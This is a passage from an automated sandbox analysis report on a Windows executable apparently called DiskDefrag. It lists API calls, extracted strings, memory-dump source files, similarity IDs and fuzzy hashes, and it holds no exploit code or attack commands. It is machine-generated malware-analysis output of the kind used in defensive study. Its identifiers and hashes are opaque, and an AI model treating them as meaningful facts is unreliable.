                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0041F6D0,?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000), ref: 004262B5
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,?,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 004262E1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00094638,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000,?), ref: 004262F2
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 0042630F
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,8F,00000001,00000000,00000000,00000000,00000000,?,00094638,?,?,0041F6D0,00000000,?,00000000), ref: 00426330
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3322701435-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,BB40E64E), ref: 0045FBFD
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045FD6C
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00460023
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00460032
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLastUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 2002255750-259948872
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004055AD
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,...,00000003,?), ref: 0040561D
                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 00405675
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                                                                                                                                                                                    • String ID: ...$`=
                                                                                                                                                                                                                                                                                    • API String ID: 223599850-889875407
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                    • GetDIBColorTable.GDI32(00000000,?,00000001,?,?,?,004042D6,?,?,?,?,?,?,?,00000000), ref: 0040431B
                                                                                                                                                                                                                                                                                    • TransparentBlt.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,004042D6,?,?,?), ref: 00404360
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004043F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401270: CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,004042D6,?), ref: 004043AC
                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,?,?,?,00000000,00CC0020), ref: 004043DE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$AlphaBlendColorCompatibleCreateExchangeInterlockedStretchTableTransparent
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1847558199-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction ID: 431ece418818d9ed3e284c2d9fdf2eea9b1bc5e51d71579e1970bbd9de33fc15
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ccb637a71d9e589383f213da76c4c0399f3231d086deb3d0b5e9ca5541171ac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6641C9B1208740AFD214CB6AC884E2BB7E9EBCD718F108B1DF59DA3691D674ED01CB65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041109B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110AE
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004110CF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 004110E2
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0041110B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0041111E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • LPtoDP.GDI32(?,?,00000002), ref: 0040E9EE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EA08
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,?,0047D9F0,00000000), ref: 0040EA2E
                                                                                                                                                                                                                                                                                    • DPtoLP.GDI32(?,?,00000002), ref: 0040EA45
                                                                                                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 0040EA78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapColorMode
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 451781270-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction ID: 3bfa88b0da709e4d3224c5894ad5c167e82e64c80dae2195e34fb9d2b55d46f1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931E975200600AFC724DF65D984D5BB7E9FF88700B448A2DA94A8B646DB34E944CFA5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0045619C
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004561B2
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004561D8
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00456226
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$FileSystem$CountCriticalEnterSectionTick
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 220952284-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 9b821a3dd54ab9ed9db7fcd5dc35dbb8b01fc2355ba314658f3cb738f20e72fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 934190aa3f0b3ae95b724ee9cdb0041c178ee72d2cde610639a7ed787e377e39
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b821a3dd54ab9ed9db7fcd5dc35dbb8b01fc2355ba314658f3cb738f20e72fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD117B1A04B06EFC314DF65C484A9AFBE4FF48701F904A1EE85993611DB34B958CF9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 004679CE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004679E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DeleteObject
                                                                                                                                                                                                                                                                                    • String ID: 8K$`=
                                                                                                                                                                                                                                                                                    • API String ID: 4188969710-450670534
                                                                                                                                                                                                                                                                                    • Opcode ID: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction ID: 57d6ba00d9628d7bc6127d5ab1f70525051783d1f21ea283ef51d44a992bc025
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92612C70A08316DFD714EF64C884A1AB7A5BF84318F1088AEE955A7351E734EC45CFAB
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                    • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                    • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,?,00000000), ref: 004311B1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004311C3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-4007200279
                                                                                                                                                                                                                                                                                    • Opcode ID: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                    • Instruction ID: 3c3eec78f5ba70d7f73749eb8d42c303dcc8a252b1b76d151490117dce650f0e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 502c51c2ec178f428166c2452066da618523e55121de244a43143375eb21c717
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F34119717802055BEB10AF75CD82FBA3284DB59764F000A3EFA06EF2D2DA6CDC48466D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432C6E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432CB4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402077$3402078$tFH
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2744557037
                                                                                                                                                                                                                                                                                    • Opcode ID: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                    • Instruction ID: 0052325b0c9a5ab111783a0a252863c2f47d3c18ee4d5c8230f443e5887af2fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a14f707ade8a06f74c98b1bb9dd0f0bab00e6a46749f54205f261b932b07e13
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 415160712083819FD325EF20DE99FDBB7E4AF99704F00491EF18E92191CBB46948CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32 ref: 0041DC8E
                                                                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0041DCBD
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0041DD06
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(BB40E64E,00000000), ref: 0041DD33
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$LongName$BrowseFolderFromList
                                                                                                                                                                                                                                                                                    • String ID: 3402075
                                                                                                                                                                                                                                                                                    • API String ID: 4132326259-2194680865
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                    • #165.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$#165ExistsFileFolderSpecial
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$\DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 3813007343-1352560241
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
